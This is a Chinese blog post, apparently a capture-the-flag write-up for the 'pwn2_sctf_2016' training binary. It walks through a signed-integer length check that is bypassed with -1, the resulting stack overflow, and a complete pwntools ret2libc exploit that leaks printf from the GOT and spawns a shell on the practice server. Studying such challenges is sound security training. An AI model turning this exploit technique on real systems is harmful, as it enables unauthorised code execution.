加载头像

pwn2_sctf_2016

Ubuntu 16

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/pwn2_sctf_2016/pwn2_sctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled	//栈不可执行
    PIE:      No PIE (0x8048000)

IDA

vuln()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
int vuln()
{
  char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF
  int v2; // [esp+3Ch] [ebp-Ch]

  printf("How many bytes do you want me to read? ");
  get_n(nptr, 4);
  v2 = atoi(nptr);			//v2为unsigned int ,这里输入一个负数
  if ( v2 > 32 )			//
    return printf("No! That size (%d) is too large!\n", v2);
  printf("Ok, sounds good. Give me %u bytes of data!\n", v2);
  get_n(nptr, v2);
  return printf("You said: %s\n", nptr);	//nptr溢出
}

get_n()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __cdecl get_n(int a1, unsigned int a2)
{
  unsigned int v2; // eax
  int result; // eax
  char v4; // [esp+Bh] [ebp-Dh]
  unsigned int i; // [esp+Ch] [ebp-Ch]

  for ( i = 0; ; ++i )
  {
    v4 = getchar();
    if ( !v4 || v4 == 10 || i >= a2 )
      break;
    v2 = i;
    *(_BYTE *)(v2 + a1) = v4;
  }
  result = a1 + i;
  *(_BYTE *)(a1 + i) = 0;
  return result;
}

无system()

无bin_sh

0x02

思路 ret2libc

1.写入一个负数跳过第一个return

2.nptr溢出泄露printf()

3.LibcSearcher计算system()和/bin/sh地址

4.重新执行main(),再次溢出至system()

s 0x2C
rbp 0x4
ret printf()
printf() main()
arg printf_got
s 0x2C
rbp 0x4
ret system()
system_ret 0xdeadbeef
arg bin_sh

0x03

libc-2.23.so

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from LibcSearcher import *

context(log_level='debug', arch='i386', os='linux')
# io = process(['./pwn2_sctf_2016'])
io = remote('node4.buuoj.cn', 26225)
elf = ELF('./pwn2_sctf_2016')

io.sendline(b'-1')
io.recv()
padding = 0x2c + 0x4
fmt_str = 0x8048700
printf_plt = elf.plt['printf']
main = elf.symbols['main']
printf_got = elf.got['printf']
payload = flat(b'a' * padding, printf_plt, main, printf_got)
io.sendline(payload)
printf_addr = u32(io.recvuntil(b'\xf7')[-4:])
# gdb.attach(io)
print('[+] printf_addr ', hex(printf_addr))

# libc = LibcSearcher('printf', printf_addr)
# libc_base = printf_addr - libc.dump('printf')
# system = libc_base + libc.dump('system')
# bin_sh = libc_base + libc.dump('str_bin_sh')

libc = ELF('./libc-2.23.so')
libc_base = printf_addr - libc.symbols['printf']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search(b'/bin/sh\x00').__next__()
print('[+] libc_base ', hex(libc_base))
print('[+] system_addr ', hex(system))
print('[+] bin_sh_addr ', hex(bin_sh))

io.sendlineafter(b'read?', b'-1')
ret_addr = 0x08048346
# payload1 = flat(b'a' * padding, ret_addr, system, 0xdeadbeef, bin_sh)
payload1 = flat(b'a' * padding, system, 0xdeadbeef, bin_sh)
io.sendlineafter(b'data!', payload1)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體